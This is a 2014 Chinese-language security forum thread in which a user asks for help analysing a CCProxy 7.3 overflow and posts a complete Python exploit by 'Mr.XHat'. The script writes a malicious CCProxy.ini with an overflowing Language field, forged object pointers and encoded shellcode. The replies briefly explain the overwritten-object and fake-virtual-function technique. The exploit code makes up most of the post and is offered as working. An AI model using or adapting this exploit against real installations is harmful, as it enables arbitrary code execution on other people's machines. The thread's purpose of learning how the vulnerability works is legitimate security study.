首页
社区
课程
招聘
[求助]CCProxy7.3溢出求调试分析......
发表于: 2014-1-12 23:00 3085

[求助]CCProxy7.3溢出求调试分析......

2014-1-12 23:00
3085
CCProxy7.3小菜分析了本天不得结果求大牛调试分析.漏洞是如何形成的......

由于文件超过3M不能上传.小菜给出小载地址http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe

并贴出利用代码

#!/usr/bin/env python

# Exploit Title: CCProxy v7.3 Integer Overflow Exploit
# Date: 2013/03/22
# Author: Mr.XHat
# E-Mail: Mr.XHat {AT} GMail.com
# Vendor Homepage: http://www.youngzsoft.net/
# Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe
# Version: Prior To 7.3
# Discovered By: Mr.XHat
# Tested On: WinXP SP3 EN

hdr = "[System]"
hdr += "\x0d\x0a"
hdr += "Ver=7.3"
hdr += "\x0d\x0a"
hdr += "Language="

# EAX: 0x41414131
buf = "\x41" * 1028
gdt1 = "\x04\xB4\x12\x00"
pad1 = "\x41" * 4
gdt2 = "\xF4\xB3\x12\x00"
pad2 = "\x41" * 12
gdt3 = "\x04\xB4\x12\x00"

sc = (
# Avoid: '\x00\xff\xf5'
"\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba" +
"\xb3\x5c\xb6\x83\xeb\xfc\xe2\xf4\x46\x5b\xd5\xb6\xba\xb3" +
"\x3c\x3f\x5f\x82\x8e\xd2\x31\xe1\x6c\x3d\xe8\xbf\xd7\xe4" +
"\xae\x38\x2e\x9e\xb5\x04\x16\x90\x8b\x4c\x6d\x76\x16\x8f" +
"\x3d\xca\xb8\x9f\x7c\x77\x75\xbe\x5d\x71\x58\x43\x0e\xe1" +
"\x31\xe1\x4c\x3d\xf8\x8f\x5d\x66\x31\xf3\x24\x33\x7a\xc7" +
"\x16\xb7\x6a\xe3\xd7\xfe\xa2\x38\x04\x96\xbb\x60\xbf\x8a" +
"\xf3\x38\x68\x3d\xbb\x65\x6d\x49\x8b\x73\xf0\x77\x75\xbe" +
"\x5d\x71\x82\x53\x29\x42\xb9\xce\xa4\x8d\xc7\x97\x29\x54" +
"\xe2\x38\x04\x92\xbb\x60\x3a\x3d\xb6\xf8\xd7\xee\xa6\xb2" +
"\x8f\x3d\xbe\x38\x5d\x66\x33\xf7\x78\x92\xe1\xe8\x3d\xef" +
"\xe0\xe2\xa3\x56\xe2\xec\x06\x3d\xa8\x58\xda\xeb\xd0\xb2" +
"\xd1\x33\x03\xb3\x5c\xb6\xea\xdb\x6d\x3d\xd5\x34\xa3\x63" +
"\x01\x43\xe9\x14\xec\xdb\xfa\x23\x07\x2e\xa3\x63\x86\xb5" +
"\x20\xbc\x3a\x48\xbc\xc3\xbf\x08\x1b\xa5\xc8\xdc\x36\xb6" +
"\xe9\x4c\x89\xd5\xdb\xdf\x3f\x98\xdf\xcb\x39\xb6"
)

exp = hdr+buf+gdt1+pad1+gdt2+pad2+gdt3+sc
file = open("CCProxy.ini", "w")
file.write(exp)
file.close()

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 967
活跃值: (1138)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
2
Mark 会公司看 果然很基础 呵呵
2014-1-13 08:01
0
雪    币: 214
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
貌似Strcpy??????
2014-1-13 12:05
0
雪    币: 967
活跃值: (1138)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
4
首先对象被覆盖,接着构造虚假虚函数Clone,从而进入shellcode
2014-1-13 12:08
0
雪    币: 214
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
不明虚函数Allocate被覆盖 神马意思.....求大牛科普下........写篇调试分析过程出来...................................

不明白他这一段是什么意思???
gdt1 = "\x04\xB4\x12\x00"
pad1 = "\x41" * 4
gdt2 = "\xF4\xB3\x12\x00"
pad2 = "\x41" * 12
gdt3 = "\x04\xB4\x12\x00"
2014-1-13 12:38
0
雪    币: 214
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
EIP SEH 没有被0x41覆盖.为什么要构造虚假虚函数Allocate?????求大牛指点......
2014-1-13 13:52
0
游客
登录 | 注册 方可回帖
返回
//